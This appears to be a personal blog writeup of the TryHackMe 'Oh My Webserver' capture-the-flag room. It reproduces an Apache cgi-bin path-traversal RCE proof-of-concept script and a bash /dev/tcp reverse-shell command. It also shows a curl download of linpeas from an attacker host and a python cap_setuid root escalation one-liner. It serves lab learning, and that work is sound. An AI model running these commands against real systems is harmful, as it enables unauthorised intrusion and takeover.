Oh My Webserver — Writeup

Rishabh Rai
4 min readMar 5, 2022


LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb

My Target IP :

Let’s run a quick recon on the Target IP

nmap -p- — min-rate 1000

strange i am getting 80 port closed.

This thing i learned in a ctf. which is try to use the knock command to check if the port opens or not.

and it worked!

Running a detailed scan on the discovered port.

nmap -p 80,22 -sCV -oN nmap_initial -Pn

note the version of webserver

started a Dir Bruteforcing on the WebServer.

There is an error which might be exploitable but we don’t know for sure.

So let’s use the most powerful tool in CyberSec that is GOOGLE.

On googling for the exploit of the version of the web server running i found:


if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo ./PoC.sh targets.txt /etc/passwd
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

First copy this exploit and save as exploit.sh and then create a targets.txt file containing “http://<targetIP>”

chmod +x exploit.sh

echo -e ‘http://<TARGET_IP>’ > targets.txt

bash exploit.sh targets.txt /bin/sh “<command>”

Now that we have RCE. Let’s get a reverse shell.

bash exploit.sh targets.txt /bin/bash “bash -i >& /dev/tcp/ 0>&1”

What is the user flag?

To get root in docker container i downloaded linpeas and executed it

curl http://<attacker_ip>:<port>/linpeas.sh -o linpeas.sh

chmod +x linpeas.sh && ./linpeas.sh > out.txt

On reading the linpeas output I found something interesting in the capabilities.


cap_setuid can be exploited by

/usr/bin/python3.7 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

cat /root/user.txt

What is the root flag?

For further enumeration I executed linpeas again.


Didn’t find much in linpeas, except this IP so i thought of scanning it so for that i will have to get nmap on the box so let’s get nmap.

HOW to get nmap executable which u can tranfer and run.

GIT HUB LINK: https://github.com/andrew-d/static-binaries

now let’s run a python server here and tranfer to the shell.

chmod +x nmap_

let’s run this :

./nmap_ -p- — min-rate 1000

(we know the IP to scan from linpeas’s output)

5986 port seems interesting, let’s google if there is a exploit for this.

unauthenticated RCE CVE-2021–38647



THERE YOU HAVE IT! Room is completed


LINK TREE: https://linktr.ee/RishabhRai



Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.